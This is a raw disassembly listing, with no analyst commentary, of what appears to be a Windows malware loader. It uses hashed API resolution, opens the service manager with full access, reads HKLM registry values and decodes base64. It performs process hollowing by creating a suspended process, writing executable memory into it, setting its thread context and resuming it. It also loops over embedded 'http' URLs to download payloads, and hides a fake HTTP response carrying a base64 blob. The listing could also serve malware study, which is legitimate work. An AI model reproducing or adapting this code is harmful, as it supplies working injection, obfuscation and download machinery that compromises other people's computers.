push 0F003Fh
push 0
push 0
push ds:dword_402216
push offset byte_401BC1
call sub_40173B
call eax
or eax, eax
jz locret_402CAC
mov dword_41EED8, eax
push offset word_402BE6
call sub_4016B4
nop
push 0F01FFh
push offset word_405842
push dword_41EED8
push ds:dword_4022F6
push offset byte_401BC1
call sub_40173B
call eax
or eax, eax
jz short loc_402C94
mov dword_41FFA9, eax
push offset byte_41FFAD
push 1
push dword_41FFA9
push ds:dword_40237B
push offset byte_401BC1
call sub_40173B
call eax
jmp short loc_402C7C
; ---------------------------------------------------------------------------
dword_402C78 dd 0E179F1CDh ; ---------------------------------------------------------------------------
loc_402C7C: ; CODE XREF: sub_402BF9+7D�j
push dword_41FFA9
push ds:dword_402C78
push offset byte_401BC1
call sub_40173B
call eax
loc_402C94: ; CODE XREF: sub_402BF9+57�j
push dword_41EED8
push ds:dword_402598
push offset byte_401BC1
call sub_40173B
call eax
locret_402CAC: ; CODE XREF: sub_402BF9+1D�j
retn
sub_402BF9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402CAD proc near ; CODE XREF: sub_402CE7+4B�p
; sub_402CE7+A6�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
pusha
mov edi, [ebp+arg_0]
mov ebx, 0
mov ecx, 0
mov eax, [ebp+arg_4]
loc_402CC4: ; CODE XREF: sub_402CAD+2D�j
xor cl, [edi]
xor bl, [edi]
jmp short loc_402CCD
; ---------------------------------------------------------------------------
loc_402CCA: ; CODE XREF: sub_402CAD+23�j
sub cl, 20h
loc_402CCD: ; CODE XREF: sub_402CAD+1B�j
cmp cl, 20h
jnb short loc_402CCA
rol ebx, cl
inc edi
mov dl, [edi]
dec eax
or eax, eax
jnz short loc_402CC4
mov [ebp+var_4], ebx
popa
mov eax, [ebp+var_4]
leave
retn 8
sub_402CAD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402CE7 proc near ; CODE XREF: sub_402E17+FD�p
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = byte ptr -120h
var_1C = dword ptr -1Ch
var_15 = byte ptr -15h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFED4h
pusha
lea eax, [ebp+var_120]
mov [ebp+var_124], eax
push 104h
push [ebp+var_124]
call sub_40107C
push 11h
push offset byte_41FFCD
call sub_40107C
push [ebp+arg_0]
push ds:dword_401826
push offset byte_401819
call sub_40173B
call eax
push eax
push [ebp+arg_0]
call sub_402CAD
mov [ebp+var_12C], eax
jmp short loc_402D43
; ---------------------------------------------------------------------------
dword_402D3F dd 314EE3ABh ; ---------------------------------------------------------------------------
loc_402D43: ; CODE XREF: sub_402CE7+56�j
push 0
push 0
push 0
push 0
push [ebp+var_124]
push 0
push 0
push 0
push ds:dword_402D3F
push offset byte_401819
call sub_40173B
call eax
push [ebp+var_124]
push ds:dword_401826
push offset byte_401819
call sub_40173B
call eax
cmp eax, 0
jbe short loc_402D92
push eax
push [ebp+var_124]
call sub_402CAD
loc_402D92: ; CODE XREF: sub_402CE7+9D�j
xor [ebp+var_12C], eax
push offset byte_41FFCD
push [ebp+var_12C]
call sub_40386C
lea eax, [ebp+var_15]
mov [ebp+var_1C], eax
push 0Fh
push [ebp+var_1C]
call sub_40107C
mov [ebp+var_128], 10h
lea eax, [ebp+var_128]
jmp short loc_402DCE
; ---------------------------------------------------------------------------
dword_402DCA dd 82146C22h ; ---------------------------------------------------------------------------
loc_402DCE: ; CODE XREF: sub_402CE7+E1�j
push eax
push [ebp+var_1C]
push ds:dword_402DCA
push offset byte_401819
call sub_40173B
call eax
push [ebp+var_1C]
push ds:dword_401826
push offset byte_401819
call sub_40173B
call eax
push eax
push [ebp+var_1C]
call sub_402CAD
lea ebx, byte_41FFCD
add ebx, 8
push ebx
push eax
call sub_40386C
popa
leave
retn 4
sub_402CE7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402E17 proc far ; CODE XREF: .text:004033F7�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push 19000h
push 40h
push ds:dword_401D0F
push offset byte_401819
call sub_40173B
call eax
mov dword_42001E, eax
lea ebx, [ebp+var_4]
jmp short loc_402E71
; ---------------------------------------------------------------------------
loc_402E40: ; DATA XREF: sub_402E17+5C�o
jns short loc_402E6E
sub ch, [edx-5BD1F52Fh]
lds ebx, [ebx]
and eax, 0B3DFEA8h
mov ah, ah
xor [edi], ebx
xchg eax, ecx
retf
; ---------------------------------------------------------------------------
db 9, 10h, 8Bh
dd 960E31F3h, 0B92D10B7h, 970B2BD4h, 0B30D30F2h, 8C0A2CF2h
db 0F8h, 30h
; ---------------------------------------------------------------------------
loc_402E6E: ; CODE XREF: sub_402E17:loc_402E40�j
push edi
retf
; ---------------------------------------------------------------------------
db 0B9h
; ---------------------------------------------------------------------------
loc_402E71: ; CODE XREF: sub_402E17+27�j
push 0
lea eax, loc_402E40
push eax
call sub_401501
push ebx
push 20019h
push 0
push eax
push 80000002h
push ds:dword_401D42
push offset byte_401BC1
call sub_40173B
call eax
or eax, eax
jnz short loc_402F0B
mov [ebp+var_8], 19000h
lea ebx, [ebp+var_8]
jmp short loc_402EC1
; ---------------------------------------------------------------------------
byte_402EAF db 9Ah ; DATA XREF: sub_402E17+AC�o
dd 0CE03DE10h, 0C50BEECFh, 0CD05E8F6h, 0E01EF9D3h
db 0C2h
; ---------------------------------------------------------------------------
loc_402EC1: ; CODE XREF: sub_402E17+96�j
push 0
lea eax, byte_402EAF
push eax
call sub_401501
push ebx
push dword_42001E
push 0
push 0
push eax
push [ebp+var_4]
push ds:dword_401D8E
push offset byte_401BC1
call sub_40173B
call eax
jmp short loc_402EF6
; ---------------------------------------------------------------------------
dword_402EF2 dd 2F4A1A22h ; ---------------------------------------------------------------------------
loc_402EF6: ; CODE XREF: sub_402E17+D9�j
push [ebp+var_4]
push ds:dword_402EF2
push offset byte_401BC1
call sub_40173B
call eax
loc_402F0B: ; CODE XREF: sub_402E17+8A�j
mov eax, dword_42001E
add eax, 8
push eax
call sub_402CE7
leave
retn
sub_402E17 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 90h
dword_402F1C dd 21002200h, 23116549h, 0C0493957h, 0DF301FFAh, 683F53F0h
; DATA XREF: .text:00403420�o
dd 0A9492407h, 0B4A0D4CCh, 0BE537DC6h, 8085E9CEh, 981A77AFh
dd 0E89BFCFDh, 0F5B09F89h, 49DCBB99h, 0D1B4C028h, 3E3F11B4h
dd 668FE74Eh, 0A3142B16h, 635ECDh, 5A320023h, 0E0940074h
dd 0CAF0C3B3h, 416EB897h, 0EB9CC6B1h, 0E2CCF483h, 3731164h
dd 0E48A0E61h, 81EF7619h, 0ABC4F59Fh, 0E0CE395Bh, 0B9D78BE8h
dd 650CD9F6h, 705E4628h, 84E395F6h, 0A35E28Bh, 0E1D197A7h
dd 4A784D7Eh, 96000800h, 0ACF591F7h, 8EE584DAh, 1761FFEh
dd 0C6F432h, 0E99C0006h, 0CCA9C4B7h, 390AD6A4h, 600E4D6h
dd 0B0641100h, 370A66C2h, 758BE45Ah
db 1Bh
db 0, 0Ch, 0 ; DATA XREF: start+55�o
dd 0A0D6087Bh, 0E68E6D0Eh, 83F03A55h, 0F9D7C8BCh, 78002441h
dd 4C6C3D58h
dword_402FF8 dd 0FF8B002Eh byte_402FFC db 0FFh ; DATA XREF: sub_4030FB+46�r
db 3 dup(0FFh)
dd 9 dup(0FFFFFFFFh), 3EFFFFFFh, 3FFFFFFFh, 37363534h
dd 3B3A3938h, 0FFFF3D3Ch, 0FFFF00FFh, 20100FFh, 6050403h
dd 0A090807h, 0E0D0C0Bh, 1211100Fh, 16151413h, 0FF191817h
dd 0FFFFFFFFh, 1C1B1AFFh, 201F1E1Dh, 24232221h, 28272625h
dd 2C2B2A29h, 302F2E2Dh, 0FF333231h, 20h dup(0FFFFFFFFh)
db 3 dup(0FFh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4030FB proc near ; CODE XREF: .text:00403453�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
pusha
push [ebp+arg_0]
push ds:dword_401826
push offset byte_401819
call sub_40173B
call eax
mov [ebp+var_4], eax
or eax, eax
jnz short loc_403127
mov eax, 0FFFFFFFFh
leave
retn 8
; ---------------------------------------------------------------------------
loc_403127: ; CODE XREF: sub_4030FB+21�j
mov esi, [ebp+arg_0]
mov edi, [ebp+arg_4]
mov ecx, [ebp+var_4]
shr ecx, 2
cld
loc_403134: ; CODE XREF: sub_4030FB+6C�j
push ecx
push 4
pop ecx
xor ebx, ebx
lodsd
loc_40313B: ; CODE XREF: sub_4030FB+5A�j
push eax
and eax, 0FFh
mov al, ds:byte_402FFC[eax]
cmp al, 0FFh
jz short loc_40316D
shl ebx, 6
or bl, al
pop eax
shr eax, 8
dec ecx
jnz short loc_40313B
mov eax, ebx
shl eax, 8
xchg ah, al
ror eax, 10h
xchg ah, al
stosd
dec edi
pop ecx
dec ecx
jnz short loc_403134
xor eax, eax
jmp short loc_403170
; ---------------------------------------------------------------------------
loc_40316D: ; CODE XREF: sub_4030FB+4E�j
push 0FFFFFFFFh
pop eax
loc_403170: ; CODE XREF: sub_4030FB+70�j
popa
leave
retn 8
sub_4030FB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403175 proc near ; CODE XREF: .text:00403495�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
push eax
push ebx
push ecx
push [ebp+arg_0]
pop ecx
lea ebx, [ecx]
add ebx, [ebp+arg_4]
loc_403184: ; CODE XREF: sub_403175+1E�j
mov al, [ecx]
cmp al, [ebp+arg_8]
jnz short loc_403190
mov al, [ebp+arg_C]
mov [ecx], al
loc_403190: ; CODE XREF: sub_403175+14�j
inc ecx
cmp ecx, ebx
jnz short loc_403184
pop ecx
pop ebx
pop eax
leave
retn 10h
sub_403175 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40319C proc near ; CODE XREF: .text:00403444�p
; .text:00403519�p ...
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
push 105h
push 40h
push ds:dword_401D0F
push offset byte_401819
call sub_40173B
call eax
mov [ebp+var_4], eax
jmp short loc_4031C4
; ---------------------------------------------------------------------------
dword_4031C0 dd 0B3967D80h ; ---------------------------------------------------------------------------
loc_4031C4: ; CODE XREF: sub_40319C+22�j
push [ebp+var_4]
push 0
push 0
push offset dword_402FF8
push ds:dword_4031C0
push offset byte_401819
call sub_40173B
call eax
loc_4031E2: ; CODE XREF: sub_40319C+107�j
jmp short loc_4031ED
; ---------------------------------------------------------------------------
dword_4031E4 dd 67063200h, 5DE14FBAh; ---------------------------------------------------------------------------
cmpsb
loc_4031ED: ; CODE XREF: sub_40319C:loc_4031E2�j
jmp short loc_4031F3
; ---------------------------------------------------------------------------
dword_4031EF dd 0E29B805Dh ; ---------------------------------------------------------------------------
loc_4031F3: ; CODE XREF: sub_40319C:loc_4031ED�j
push 0
push 0
push [ebp+var_4]
push [ebp+arg_0]
push 0
push ds:dword_4031EF
push offset dword_4031E4
call sub_40173B
call eax
cmp [ebp+arg_4], 1
jnz loc_4032A8
push 400h
push offset dword_42D0C0
call sub_40107C
push 0
push 80h
push 3
push 0
push 3
push 80000000h
push [ebp+var_4]
push ds:dword_401EA4
push offset byte_401819
call sub_40173B
call eax
cmp eax, 0FFFFFFFFh
jz short loc_4032A8
mov [ebp+var_10], eax
push 0
push offset dword_405000
push 400h
push offset dword_42D0C0
push [ebp+var_10]
push ds:dword_401F22
push offset byte_401819
call sub_40173B
call eax
push [ebp+var_10]
push ds:dword_40195F
push offset byte_401819
call sub_40173B
call eax
cmp dword_405000, 0
jnz short loc_4032A8
cmp [ebp+arg_C], 1
jnz short loc_4032A8
jmp loc_4031E2
; ---------------------------------------------------------------------------
loc_4032A8: ; CODE XREF: sub_40319C+79�j
; sub_40319C+B8�j ...
cmp [ebp+arg_8], 1
jnz short locret_4032F8
mov dword_420054, 1
mov word_420058, 0Ah
push offset dword_42006C
push offset dword_420028
push 0
push 0
push 0
push 0
push 0
push 0
push [ebp+var_4]
push 0
push ds:dword_402B14
push offset byte_401819
call sub_40173B
call eax
or eax, eax
jz short locret_4032F8
inc dword_42DADA
locret_4032F8: ; CODE XREF: sub_40319C+110�j
; sub_40319C+154�j
leave
retn 10h
sub_40319C endp
; ---------------------------------------------------------------------------
loc_4032FC: ; CODE XREF: .text:00403331�j
; DATA XREF: .text:00403405�o
jmp short loc_403302
; ---------------------------------------------------------------------------
dword_4032FE dd 0DF891656h ; ---------------------------------------------------------------------------
loc_403302: ; CODE XREF: .text:loc_4032FC�j
push dword_42CCBC
push ds:dword_4032FE
push offset byte_401819
call sub_40173B
call eax
push 0FAh
push ds:dword_401B46
push offset byte_401819
call sub_40173B
call eax
jmp short loc_4032FC
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
loc_403334: ; DATA XREF: start+1A0�o
push 402FBFh
call sub_4016B4
jmp short loc_403344
; ---------------------------------------------------------------------------
dword_403340 dd 0A8A697CBh ; .text:0040336A�r ...
; ---------------------------------------------------------------------------
loc_403344: ; CODE XREF: .text:0040333E�j
push offset word_405842
push ds:dword_403340
push offset byte_401819
call sub_40173B
call eax
push 402FACh
call sub_4016B4
push offset word_405842
push ds:dword_403340
push offset byte_401819
call sub_40173B
call eax
jmp short loc_403382
; ---------------------------------------------------------------------------
dword_40337E dd 6C29D170h ; ---------------------------------------------------------------------------
loc_403382: ; CODE XREF: .text:0040337C�j
push ds:dword_40337E
push offset byte_401819
call sub_40173B
call eax
jmp short loc_40339A
; ---------------------------------------------------------------------------
dword_403396 dd 0A0D17303h ; ---------------------------------------------------------------------------
loc_40339A: ; CODE XREF: .text:00403394�j
push offset dword_42D8CC
push 105h
push ds:dword_403396
push offset byte_401819
call sub_40173B
call eax
push 402FCEh
call sub_4016B4
push offset word_405842
push ds:dword_403340
push offset byte_401819
call sub_40173B
call eax
jmp short loc_4033DD
; ---------------------------------------------------------------------------
dword_4033D9 dd 0ADE81485h ; ---------------------------------------------------------------------------
loc_4033DD: ; CODE XREF: .text:004033D7�j
push ds:dword_4033D9
push offset byte_401819
call sub_40173B
call eax
add eax, 0Ch
mov dword_42CCBC, eax
call near ptr sub_402E17
push offset dword_405000
push 0
push 0
push offset loc_4032FC
push 0
push 0
push ds:dword_402A4E
push offset byte_401819
call sub_40173B
call eax
push offset dword_402F1C
call sub_4016B4
push offset byte_41FFCD
push offset word_405842
call lstrcatA ; lstrcatA
push 1
push 0
push 1
push offset word_405842
call sub_40319C
push offset dword_42D4C0
push offset dword_42D0C0
call sub_4030FB
lea edi, dword_42D4C0
mov ah, [edi]
cmp ah, 31h
jnz short loc_40346F
mov dword_42DAE6, 1
loc_40346F: ; CODE XREF: .text:00403463�j
push offset dword_42D4C0
push ds:dword_401826
push offset byte_401819
call sub_40173B
call eax
mov dword_42D8C0, eax
push 0
push 20h
push eax
push offset dword_42D4C0
call sub_403175
mov edi, offset dword_42D4C0
mov dword_42D8C4, 0
push 0
pop dword_42DAD6
push 0
pop dword_42DADA
loc_4034B9: ; CODE XREF: .text:00403528�j
push edi
push offset dword_42CCC0
push ds:dword_401B95
push offset byte_401819
call sub_40173B
call eax
push offset dword_42CCC0
push ds:dword_401826
push offset byte_401819
call sub_40173B
call eax
or eax, eax
jnz short loc_4034F6
mov dword_42D8C4, 1
loc_4034F6: ; CODE XREF: .text:004034EA�j
add edi, eax
inc edi
push edi
mov edi, offset dword_42CCC0
mov eax, [edi]
cmp eax, 70747468h
jnz short loc_40351E
inc dword_42DAD6
push 1
push 1
push 0
push offset dword_42CCC0
call sub_40319C
loc_40351E: ; CODE XREF: .text:00403506�j
pop edi
cmp dword_42D8C4, 0
jnz short loc_40352A
jmp short loc_4034B9
; ---------------------------------------------------------------------------
loc_40352A: ; CODE XREF: .text:00403526�j
mov eax, dword_42DAD6
cmp eax, dword_42DADA
jnz short loc_40355E
or eax, eax
jz short loc_40355E
cmp dword_42DAE6, 0
jbe short loc_40355E
push 402F63h
call sub_4016B4
push 1
push 0
push 0
push offset word_405842
call sub_40319C
loc_40355E: ; CODE XREF: .text:00403535�j
; .text:00403539�j ...
push 32h
push ds:dword_401B46
push offset byte_401819
call sub_40173B
call eax ; dword_42DAD6
cmp dword_42DAD6, 0
jnz short loc_40355E
push 36B0h
push ds:dword_401B46
push offset byte_401819
call sub_40173B
call eax ; dword_42DAD6
push 0
push ds:dword_402467
push offset byte_401819
call sub_40173B
call eax ; dword_42DAD6
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4035A7 proc near ; CODE XREF: start�p
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
push ebp
mov ebp, esp
add esp, 0FFFFFF68h
lea eax, [ebp+var_94]
mov [ebp+var_98], eax
push 94h
push [ebp+var_98]
call sub_40107C
mov [ebp+var_94], 94h
jmp short loc_4035DC
; ---------------------------------------------------------------------------
dword_4035D8 dd 74C06DBDh ; ---------------------------------------------------------------------------
loc_4035DC: ; CODE XREF: sub_4035A7+2F�j
push [ebp+var_98]
push ds:dword_4035D8
push offset byte_401819
call sub_40173B
call eax
cmp [ebp+var_90], 5
jbe short locret_403611
push 0
push ds:dword_402467
push offset byte_401819
call sub_40173B
call eax
locret_403611: ; CODE XREF: sub_4035A7+54�j
leave
retn
sub_4035A7 endp
; =============== S U B R O U T I N E =======================================
public start
start proc near
call sub_4035A7
call sub_402BF9
push 0
pop eax
call sub_401B6C
push 1
pop eax
call sub_402A4C
push 400h
push offset dword_420368
push 0
push ds:dword_401FB8
push offset byte_401819
call sub_40173B
call eax
mov dword_420028, 44h
mov dword_420054, 1
mov word_420058, 2
push offset byte_402FDD
call sub_4016B4
push offset word_405842
push offset dword_420568
push ds:dword_40271D
push offset byte_401819
call sub_40173B
call eax
nop
push offset dword_420368
push offset dword_420568
push ds:dword_40271D
push offset byte_401819
call sub_40173B
call eax
push offset dword_42006C
push offset dword_420028
push 0
push 0
push 4
push 0
push 0
push 0
push offset dword_420568
push 0
push ds:dword_402B14
push offset byte_401819
call sub_40173B
call eax
or eax, eax
jnz short loc_4036E3
jmp loc_40382F
; ---------------------------------------------------------------------------
loc_4036E3: ; CODE XREF: start+C9�j
push 0
push ds:dword_401F9E
push offset byte_401819
call sub_40173B
call eax
mov dword_420360, eax
mov edi, eax
add edi, [edi+3Ch]
add edi, 4
add edi, 14h
mov eax, [edi+38h]
mov dword_42007C, eax
jmp short loc_403715
; ---------------------------------------------------------------------------
dword_403711 dd 0AE6009A5h ; ---------------------------------------------------------------------------
loc_403715: ; CODE XREF: start+FC�j
push 40h
push 3000h
push dword_42007C
push dword_420360
push dword_42006C
push ds:dword_403711
push offset byte_401819
call sub_40173B
call eax
push eax
pop dword_420080
jmp short loc_40374D
; ---------------------------------------------------------------------------
dword_403749 dd 788BC763h ; ---------------------------------------------------------------------------
loc_40374D: ; CODE XREF: start+134�j
push offset dword_420084
push dword_42007C
push dword_420360
push dword_420080
push dword_42006C
push ds:dword_403749
push offset byte_401819
call sub_40173B
call eax
or eax, eax
jnz short loc_403785
jmp loc_40382F
; ---------------------------------------------------------------------------
loc_403785: ; CODE XREF: start+16B�j
push 10007h
pop dword_42008C
jmp short loc_403796
; ---------------------------------------------------------------------------
dword_403792 dd 0D55B383Bh ; ---------------------------------------------------------------------------
loc_403796: ; CODE XREF: start+17D�j
push offset dword_42008C
push dword_420070
push ds:dword_403792
push offset byte_401819
call sub_40173B
call eax
mov dword_420144, offset loc_403334
jmp short loc_4037C3
; ---------------------------------------------------------------------------
dword_4037BF dd 0E97FBAB5h ; ---------------------------------------------------------------------------
loc_4037C3: ; CODE XREF: start+1AA�j
push offset dword_42008C
push dword_420070
push ds:dword_4037BF
push offset byte_401819
call sub_40173B
call eax
or eax, eax
jnz short loc_4037E6
jmp short loc_40382F
; ---------------------------------------------------------------------------
loc_4037E6: ; CODE XREF: start+1CF�j
jmp short loc_4037EC
; ---------------------------------------------------------------------------
dword_4037E8 dd 0AFAB2FDEh ; ---------------------------------------------------------------------------
loc_4037EC: ; CODE XREF: start:loc_4037E6�j
push dword_420070
push ds:dword_4037E8
push offset byte_401819
call sub_40173B
call eax
push 34BCh
push ds:dword_401B46
push offset byte_401819
call sub_40173B
call eax
push 0
push ds:dword_402467
push offset byte_401819
call sub_40173B
call eax
loc_40382F: ; CODE XREF: start+CB�j start+16D�j ...
call sub_40220E
start endp ; sp-analysis failed
; [00000006 BYTES: COLLAPSED FUNCTION CloseHandle. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION CreateThread. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION ExitThread. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION GlobalFree. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION LoadLibraryA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION Sleep. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION VirtualProtect. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION WaitForSingleObject. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION lstrcatA. PRESS KEYPAD "+" TO EXPAND]
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40386C proc near ; CODE XREF: sub_402CE7+BC�p
; sub_402CE7+126�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov edx, [ebp+arg_4]
mov esi, [ebp+arg_0]
xor eax, eax
xor ecx, ecx
mov [edx+8], al
mov cl, 7
loc_40387F: ; CODE XREF: sub_40386C+23�j
mov eax, esi
and al, 0Fh
cmp al, 0Ah
sbb al, 69h
das
mov [ecx+edx], al
shr esi, 4
dec ecx
jns short loc_40387F
pop esi
leave
retn 8
sub_40386C endp
; ---------------------------------------------------------------------------
align 200h
_text ends
; Section 2. (virtual address 00004000)
; Virtual size : 0000010C ( 268.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00002E00
; Flags 40000040: Data Readable
; Alignment : default
;
; Imports from kernel32.dll
;
; ===========================================================================
; Segment type: Externs
; _idata
; BOOL __stdcall CloseHandle(HANDLE hObject)
extrn __imp_CloseHandle:dword ; DATA XREF: CloseHandle�r
; HANDLE __stdcall CreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId)
extrn __imp_CreateThread:dword ; DATA XREF: CreateThread�r
; void __stdcall ExitThread(DWORD dwExitCode)
extrn __imp_ExitThread:dword ; DATA XREF: ExitThread�r
; HGLOBAL __stdcall GlobalFree(HGLOBAL hMem)
extrn __imp_GlobalFree:dword ; DATA XREF: GlobalFree�r
; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
extrn __imp_LoadLibraryA:dword ; DATA XREF: LoadLibraryA�r
; void __stdcall Sleep(DWORD dwMilliseconds)
extrn __imp_Sleep:dword ; DATA XREF: Sleep�r
; BOOL __stdcall VirtualProtect(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect)
extrn __imp_VirtualProtect:dword ; DATA XREF: VirtualProtect�r
; DWORD __stdcall WaitForSingleObject(HANDLE hHandle, DWORD dwMilliseconds)
extrn __imp_WaitForSingleObject:dword ; DATA XREF: WaitForSingleObject�r
; LPSTR __stdcall lstrcatA(LPSTR lpString1, LPCSTR lpString2)
extrn __imp_lstrcatA:dword ; DATA XREF: lstrcatA�r
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 404024h
align 8
dd 4050h, 2 dup(0)
dd 40FEh, 4000h, 5 dup(0)
dd 4078h, 4086h, 4096h, 40A4h, 40B2h, 40C2h, 40CAh, 40DCh
dd 40F2h, 0
dd 6C430023h, 4865736Fh, 6C646E61h, 560065h, 61657243h
dd 68546574h, 64616572h, 9C0000h, 74697845h, 65726854h
dd 6461h, 6C4701ACh, 6C61626Fh, 65657246h, 1EA0000h, 64616F4Ch
dd 7262694Ch, 41797261h, 2BB0000h, 65656C53h, 2E20070h
dd 74726956h, 506C6175h, 65746F72h, 7463h, 615702ECh, 6F467469h
dd 6E695372h, 4F656C67h, 63656A62h, 3130074h, 7274736Ch
dd 41746163h, 656B0000h, 6C656E72h, 642E3233h, 6C6Ch, 5 dup(0)
dd 48000000h, 2F505454h, 20312E31h, 20303032h, 0A0D4B4Fh
dd 76726553h, 203A7265h, 6E69676Eh, 440A0D78h, 3A657461h
dd 6E755320h, 3231202Ch, 6C754A20h, 30303220h, 38312039h
dd 3A36303Ah, 47203534h, 0A0D544Dh, 746E6F43h, 2D746E65h
dd 65707954h, 6574203Ah, 682F7478h, 0D6C6D74h, 6E6F430Ah
dd 7463656Eh, 3A6E6F69h, 65656B20h, 6C612D70h, 0D657669h
dd 502D580Ah, 7265776Fh, 422D6465h, 50203A79h, 352F5048h
dd 362E322Eh, 6F430A0Dh, 6E65746Eh, 654C2D74h, 6874676Eh
dd 3231203Ah, 0D0A0D38h, 42434D0Ah, 5248646Fh, 38694F77h
dd 4A6E5976h, 6F6E626Ch, 77476375h, 52336376h, 39434E34h
dd 5633626Dh, 426E4C30h, 4143636Fh, 68474978h, 41486430h
dd 39794C36h
_rdata ends
; Section 3. (virtual address 00005000)
; Virtual size : 00028AEA ( 166634.)
; Section size in file : 00000000 ( 0.)
; Offset to raw data for section: 00000000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 405000h
dword_405000 dd ? ; sub_401FDC+77�o ...
dword_405004 dd ? ; sub_4010E7+68�w
dword_405008 dd ? dword_40500C dd ? dword_405010 dd ? ; StartAddress:loc_401336�o ...
dword_405014 dd ? ; sub_40134A+18D�r ...
dword_405018 dd ? ; StartAddress+18�r ...
dd 3 dup(?)
dword_405028 dd 103h dup(?) ; sub_401501+65�o
db ?
byte_405435 db 3 dup(?) ; DATA XREF: sub_40134A+4D�o
; sub_401501+77�o
dd 100h dup(?)
db 2 dup(?)
; DWORD flOldProtect
flOldProtect dd ? ; DATA XREF: sub_4015A8+7�o
; sub_4015FB+4�o
; DWORD ThreadId
ThreadId dd ? ; DATA XREF: sub_4016B4+C�o
word_405842 dw ? ; DATA XREF: sub_401673+1B�o
; sub_401B6C:loc_401B99�o ...
dd 6405h dup(?)
dword_41E858 dd ? ; sub_401814:loc_4018DD�r
dword_41E85C dd ? ; sub_401814+B0�r ...
dword_41E860 dd ? ; sub_401814+5A�w ...
dword_41E864 dd 41h dup(?) ; sub_401814:loc_4018A5�o
db ?
dword_41E969 dd ? ; sub_4018EF+42�r ...
dword_41E96D dd ? ; sub_4018EF:loc_40192C�o ...
align 4
db ?
dword_41E975 dd ? align 4
dd 5 dup(?)
db ?
byte_41E991 db 3 dup(?) ; DATA XREF: sub_4018EF:loc_40194E�o
dd 40h dup(?)
db ?
dword_41EA95 dd ? ; sub_401B6C+B9�r ...
dword_41EA99 dd ? ; sub_401B6C+E3�o
dword_41EA9D dd ? ; sub_401B6C:loc_401C93�r
dword_41EAA1 dd ? dword_41EAA5 dd ? byte_41EAA9 db 3 dup(?) ; DATA XREF: sub_401B6C+32�o
; sub_401B6C+EC�o
dd 4 dup(?)
db ?
byte_41EABD db 3 dup(?) ; DATA XREF: sub_401D07+2A�o
; sub_401D07+4A�o ...
dd 100h dup(?)
dword_41EEC0 dd ? ; sub_40220E+4E�r ...
dword_41EEC4 dd ? ; sub_40220E+81�w ...
dword_41EEC8 dd ? ; sub_40220E+66�r ...
dword_41EECC dd ? ; sub_40220E+89�o ...
dword_41EED0 dd ? ; sub_40220E+F1�r ...
dword_41EED4 dd ? dword_41EED8 dd ? ; sub_402185+5A�r ...
dword_41EEDC dd ? ; sub_402185+44�w ...
dword_41EEE0 dd ? ; sub_40220E+2DD�r
dword_41EEE4 dd ? ; sub_40220E+20D�r ...
dword_41EEE8 dd ? ; sub_40220E:loc_4023BC�o
dword_41EEEC dd ? dd 5 dup(?)
dword_41EF04 dd ? ; sub_40220E+217�r
dword_41EF08 dd ? ; sub_401E9C+97�r ...
dword_41EF0C dd ? ; sub_401E9C+61�r ...
dd 141h dup(?)
db ?
byte_41F415 db 3 dup(?) ; DATA XREF: sub_4026F2+12�o
; sub_4026F2+34�o ...
dd 0FFh dup(?)
db ?
byte_41F815 db 3 dup(?) ; DATA XREF: sub_402957+19�o
; sub_402957+3E�o
dd 0FFh dup(?)
db ?
byte_41FC15 db 3 dup(?) ; DATA XREF: sub_4026F2+16E�o
; sub_402A4C+A0�o
dd 31h dup(?)
db ?
byte_41FCDD db 3 dup(?) ; DATA XREF: sub_402957:loc_402990�o
